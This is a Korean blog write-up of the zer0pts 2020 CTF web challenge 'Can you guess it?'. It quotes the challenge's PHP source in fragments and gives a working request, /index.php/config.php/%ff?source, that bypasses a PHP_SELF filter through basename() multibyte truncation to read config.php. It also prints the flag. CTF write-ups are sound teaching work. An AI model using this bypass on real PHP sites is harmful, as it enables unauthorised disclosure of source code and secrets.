zer0pts 2020 CTF 문제 중 pwnable 분야의 Can you guess it? 이다.





위 문제의 소스 코드를 보면 아래와 같다.

include 'config.php'; // FLAG is defined in config.php

if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
  exit("I don't know what you are thinking, but I won't let you read it :)");

if (isset($_GET['source'])) {

$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
  $guess = (string) $_POST['guess'];
  if (hash_equals($secret, $guess)) {
    $message = 'Congratulations! The flag is: ' . FLAG;
  } else {
    $message = 'Wrong.';
<!doctype html>
<html lang="en">
    <meta charset="utf-8">
    <title>Can you guess it?</title>
    <h1>Can you guess it?</h1>
    <p>If your guess is correct, I'll give you the flag.</p>
    <p><a href="?source">Source</a></p>
<?php if (isset($message)) { ?>
    <p><?= $message ?></p>
<?php } ?>
    <form action="index.php" method="POST">
      <input type="text" name="guess">
      <input type="submit">


$_SERVER['PHP_SELF']와 basename() 을 주목해서 보면 아래 표를 통해 조작이 가능하다.

url $_SERVER['PHP_SELF'] basename($_SERVER['PHP_SELF'])
/index.php index.php index.php
/index.php/config.php index.php/config.php config.php


이때 /index.php/config.php/?source 라고 요청하면 preg_match 에서 걸리게 된다.

이를 우회 하기 위해서는 아래 사이트를 참고하자.


PHP: basename - Manual

if you want the name of the parent directory ');echo('$_parenDir  = '.$_parenDir.' ');echo('$_parenDir2  = '.$_parenDir2.' ');?>


즉, basename() 함수로 인해 파일 이름이 multibyte가 있다면, multibyte 부터는 잘라 버린다.

multibyte 범위는 0x80 ~ 0xff 이므로 아래와 같은 요청으로 preg_match 를 우회 할 수 있다.


url $_SERVER['PHP_SELF'] basename($_SERVER['PHP_SELF'])
/index.php/config.php/%ff?source index.php/config.php/%ff?source config.php


define('FLAG', 'zer0pts{gu3ss1ng_r4nd0m_by73s_1s_un1n73nd3d_s0lu710n}');


'CTF > zer0pts 2020 CTF' 카테고리의 다른 글

[zer0pts 2020 CTF] - notepad write up  (0) 2020.03.09
[zer0pts 2020 CTF] - Can you guess it? write up  (0) 2020.03.09
[zer0pts 2020 CTF] hipwn write up  (0) 2020.03.09